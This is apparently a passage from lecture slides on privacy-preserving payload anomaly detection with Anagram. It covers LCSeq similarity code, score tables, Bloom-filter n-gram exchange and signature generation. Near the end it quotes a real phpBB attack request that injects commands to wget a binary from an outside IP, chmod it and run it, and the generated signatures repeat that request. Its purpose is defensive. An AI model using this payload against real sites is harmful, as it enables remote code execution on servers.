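    """Length of the longest common subsequence, via standard
    row-by-row dynamic programming."""
    prev = [0] * (len(b) + 1)
    for x in a:
        cur = [0]
        for j, y in enumerate(b, 1):
            cur.append(prev[j - 1] + 1 if x == y
                       else max(prev[j], cur[j - 1]))
        prev = cur
    return prev[-1]

def similarity(a: bytes, b: bytes) -> float:
    """Similarity score 2*C / (L1 + L2), in [0, 1]."""
    if not a and not b:
        return 1.0
    return 2 * lcseq_len(a, b) / (len(a) + len(b))
```

Identical payloads score 1; unrelated payloads score near 0; fragmented or slightly reordered copies of the same content still score high, which is why LCSeq handles fragmentation better than exact string equality.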

Similarity comparison (II)
- To compare the differences more precisely, normalize and compare scores:
  - Compute the similarity score vectors V_A and V_B
  - Match their medians
  - Scale the ranges proportionally so that the min and max values match
  - The Manhattan distance is then computed between the vectors
- Each privacy-enabled technique is compared against Raw-LCSeq (the baseline)

Similarity of packets (III)

Normalized similarity scores (lower is better):

  Type  Raw-LCS  Raw-ED  MD     ZStr-LCS  ZStr-LCSeq  ZStr-ED
  G-G   .0948    .0336   .0669  .2079     .0794       .0667
  B-B   .0508    .0441   .0653  .0399     .0263       .0669
  G-B   .0251    .0240   .0110  .0311     .0193       .0231

- Unsurprisingly, Raw-ED is closest to Raw-LCSeq
- All privacy-preserving methods are close when correlating pairs that include attack traffic; they may be leveraging the difference between byte distributions
- The Manhattan distance between packet frequency distributions performs best


- The anomalous n-grams of a suspicious payload are stored in a Bloom filter and exchanged among sites
- By checking the n-grams of local alerts against the Bloom filter alert, it is easy to tell how similar the alerts are to each other
- The common malicious n-grams can be used for general signature generation, even for polymorphic worms
- Privacy-preserving, with no loss of accuracy

Robust Signature Generation

- Anagram not only detects suspicious packets, it also identifies the corresponding malicious n-grams
- These n-grams are good targets for further analysis and signature generation
- The set of n-grams is order-independent, so attack-vector reordering will fail

Anagram flattened signature for an attack

phpBB attack content:
GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|..HTTP/1.1.Host:. (compatible;.MSIE.6.0;.Windows.NT.5.1;)..

Generated signatures using different n:

N=3: *?ph*bb_*//8*p;wg*n;c*n;./c*n;ec*0YYY;echo|H*26.U*1;).*
N=5: *ums/ad*in/admin_sty*.phpadmin_sty*hp?phpbb_root_path=cmd*cmd=cd%20/tmp;wget%20216*09.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTT*6.26.Use*5.1;)..*
N=7: *dules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=*?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo| HTTP/*59.16.26.User-*T 5.1;)..*

Note: "." stands for nonprintable characters; "*" represents a wildcard for signature matching.
